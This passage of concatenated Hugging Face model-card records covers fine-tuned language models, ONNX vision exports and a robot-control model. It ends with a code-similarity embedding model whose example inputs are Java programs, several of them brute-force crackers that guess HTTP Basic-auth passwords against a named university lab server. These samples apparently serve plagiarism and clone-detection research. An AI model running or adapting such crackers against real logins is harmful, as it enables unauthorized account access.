generator = pipeline("text-generation", model="keemeng/Foundation_GPT_korean", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-8
|
vectorzhou
| 2025-09-23T14:32:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T13:21:40Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/2zoaj66c)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset17
|
onnxmodelzoo
| 2025-09-23T14:32:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:30:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset17.onnx
tags:
- Computer_Vision
---
|
pepijn223/pi0_base
|
pepijn223
| 2025-09-23T14:31:25Z | 147 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T14:54:28Z |
# π₀ (Pi0)
π₀ is a **Vision-Language-Action model for general robot control**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀ represents a breakthrough in robotics as the first general-purpose robot foundation model developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi0). Unlike traditional robots that are narrow specialists programmed for repetitive motions, π₀ is designed to be a generalist policy that can understand visual inputs, interpret natural language instructions, and control a variety of different robots across diverse tasks.
### The Vision for Physical Intelligence
As described by Physical Intelligence, while AI has achieved remarkable success in digital domains, from chess-playing to drug discovery, human intelligence still dramatically outpaces AI in the physical world. To paraphrase Moravec's paradox, winning a game of chess represents an "easy" problem for AI, but folding a shirt or cleaning up a table requires solving some of the most difficult engineering problems ever conceived. π₀ represents a first step toward developing artificial physical intelligence that enables users to simply ask robots to perform any task they want, just like they can with large language models.
### Architecture and Approach
π₀ combines several key innovations:
- **Flow Matching**: Uses a novel method to augment pre-trained VLMs with continuous action outputs via flow matching (a variant of diffusion models)
- **Cross-Embodiment Training**: Trained on data from 8 distinct robot platforms including UR5e, Bimanual UR5e, Franka, Bimanual Trossen, Bimanual ARX, Mobile Trossen, and Mobile Fibocom
- **Internet-Scale Pre-training**: Inherits semantic knowledge from a pre-trained 3B parameter Vision-Language Model
- **High-Frequency Control**: Outputs motor commands at up to 50 Hz for real-time dexterous manipulation
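For the 50 Hz figure, a minimal fixed-rate control loop sketch (scaffolding only, with placeholder observation and policy functions; not the LeRobot inference API):

```python
import time

HZ = 50
DT = 1.0 / HZ  # 20 ms control period

def get_observation():
    return {}  # placeholder: camera frames + proprioceptive state

def predict_action(obs):
    return [0.0] * 7  # placeholder: policy forward pass

for _ in range(HZ * 10):  # run for ten seconds
    t0 = time.perf_counter()
    action = predict_action(get_observation())
    # send `action` to the robot here
    # sleep off the rest of the 20 ms budget to hold the 50 Hz rate
    time.sleep(max(0.0, DT - (time.perf_counter() - t0)))
```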
## Training
For training π₀, you can use the standard LeRobot training script with the appropriate configuration:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi0 \
--output_dir=./outputs/pi0_training \
--job_name=pi0_training \
--policy.pretrained_path=pepijn223/pi0_base \
--policy.repo_id=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi0_base \
--config_name pi0_base \
--output_path /pi0_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset16
|
onnxmodelzoo
| 2025-09-23T14:30:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:53Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset16.onnx
tags:
- Computer_Vision
---
|
Obrempong77/gpt-oss-skinhair-finetuned-v1
|
Obrempong77
| 2025-09-23T14:29:48Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"gpt_oss",
"trl",
"en",
"base_model:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:51:13Z |
---
base_model: unsloth/gpt-oss-20b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- gpt_oss
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Isaac Asante Asare (Obrempong77)
- **License:** apache-2.0
- **Finetuned from model:** unsloth/gpt-oss-20b-unsloth-bnb-4bit
This gpt_oss model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
|
starriver030515/Qwen2.5-Math-1.5B-16k
|
starriver030515
| 2025-09-23T14:29:08Z | 10 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:2509.16591",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-17T07:10:05Z |
---
license: mit
library_name: transformers
pipeline_tag: text-generation
---
This is the base Qwen2.5-Math-1.5B model used by HAPO.
We change rope_theta from 10000 to 40000 and extend the context window to 16k.
We also modify the chat_template for the system prompt and add `<think>`.
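A sketch of how these two changes typically look when applied to a standard Qwen2-style config (field names follow the usual transformers config; verify against this repository's config.json):

```python
from transformers import AutoConfig

# Assumes the original Qwen2.5-Math-1.5B config as the starting point.
config = AutoConfig.from_pretrained("Qwen/Qwen2.5-Math-1.5B")
config.rope_theta = 40000               # raised from the original 10000
config.max_position_embeddings = 16384  # extend the context window to 16k
```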
# Citation
If you find our model, data, or evaluation code useful, please kindly cite our paper:
```bib
@misc{liu2025uniformheterogeneoustailoringpolicy,
title={From Uniform to Heterogeneous: Tailoring Policy Optimization to Every Token's Nature},
author={Zheng Liu and Mengjie Liu and Siwei Wen and Mengzhang Cai and Bin Cui and Conghui He and Wentao Zhang},
year={2025},
eprint={2509.16591},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2509.16591},
}
```
|
yaoyaozuru/blockassist
|
yaoyaozuru
| 2025-09-23T14:29:07Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"waddling stealthy koala",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T14:28:03Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- waddling stealthy koala
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:35Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:28:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:13Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_in21k_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:12Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:47Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_in21k_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset17
|
onnxmodelzoo
| 2025-09-23T14:27:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:26:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset16
|
onnxmodelzoo
| 2025-09-23T14:26:55Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:26:42Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset16.onnx
tags:
- Computer_Vision
---
|
ASLP-lab/WSChuan-TTS
|
ASLP-lab
| 2025-09-23T14:26:32Z | 0 | 1 | null |
[
"onnx",
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-05T13:13:52Z |
---
license: apache-2.0
---
|
onnxmodelzoo/resnetrs420_Opset17
|
onnxmodelzoo
| 2025-09-23T14:26:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:25:45Z |
---
language: en
license: apache-2.0
model_name: resnetrs420_Opset17.onnx
tags:
- Computer_Vision
---
|
buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16
|
buelfhood
| 2025-09-23T14:25:20Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:38664",
"loss:MultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T14:25:03Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:38664
- loss:MultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class sendMail\
\ {\n\npublic void sendMail(String mailServer, String recipient, String result)\
\ {\n try {\n Socket s = new Socket(mailServer, 25);\n BufferedReader\
\ in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO client\");\n\n send(in, out, \"MAIL FROM: <WatchDog@SecureECommerce.>\"\
);\n send(in, out, \"RCPT : \" + recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \");\n send(out, \"From: Admin <WatchDog@SecureECommerce.>\"\
);\n send (out, \"\\n\");\n \n send(out, result);\n send(out,\
\ \"\\n.\\n\");\n send(in, out, \"QUIT\");\n\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String\
\ strFilepath;\n private String strCurrWord;\n private File fWordFile;\n\
\ private BufferedReader in;\n \n \n public PasswordFile(String filepath)\
\ {\n strFilepath = filepath;\n try {\n fWordFile = new\
\ File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n\
\ }\n catch(Exception e)\n {\n System.out.println(\"\
Could not open file \" + strFilepath);\n }\n }\n \n String getPassword()\
\ {\n return strCurrWord;\n }\n \n String getNextPassword() {\n\
\ try {\n strCurrWord = in.readLine();\n \n \
\ \n \n }\n catch (Exception e)\n {\n \
\ \n return null;\n }\n \n return\
\ strCurrWord;\n }\n \n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class SendEMail {\n\n public\
\ void SendEMail(){}\n\npublic void sendMail(String recipient,String c, String\
\ subject){\n try {\n\n Socket s = new Socket(\"yallara.cs.rmit.edu.\"\
, 25);\n BufferedReader in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO theWorld\");\n \n \n send(in, out, \"MAIL FROM: <watch@dog.>\"\
);\n send(in, out, \"RCPT : \"+recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \"+ subject);\n send(out, \"From: WatchDog.java\"\
);\n send (out, \"\\n\");\n \n BufferedReader reader;\n String\
\ line;\n reader = new BufferedReader(new InputStreamReader(new FileInputStream()));\n\
\ line = reader.readLine();\n while (line != null){\n send(out,\
\ line);\n line = reader.readLine();\n }\n send(out, \"\\n.\\\
n\");\n send(in, out, \"QUIT\");\n s.print();\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
- source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\
import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\
\ URL url;\n private HttpURLConnection connection ;\n private int stopTime\
\ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\
\ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \
\ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\
\ }\n\n public static void main (String args[])\n {\n BruteForce bf\
\ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass BruteForce {\n\n String password=\"\";\n\n int num =401;\n\n\n \
\ public static void main (String[] args) {\n\n String str=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd=\"\
\";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n\
\ \tSystem.err.println (\n \t\t\n \t\t\"Usage : java BruteForce\
\ <username>\");\n \treturn;\n \t\n \t}\n String username\
\ = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println\
\ (\" \" + new Date());\n \n System.out.println (\"Using BruteForce\
\ method attack \"+username+\"'s password.Please waiting.......\");\n\n \
\ for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
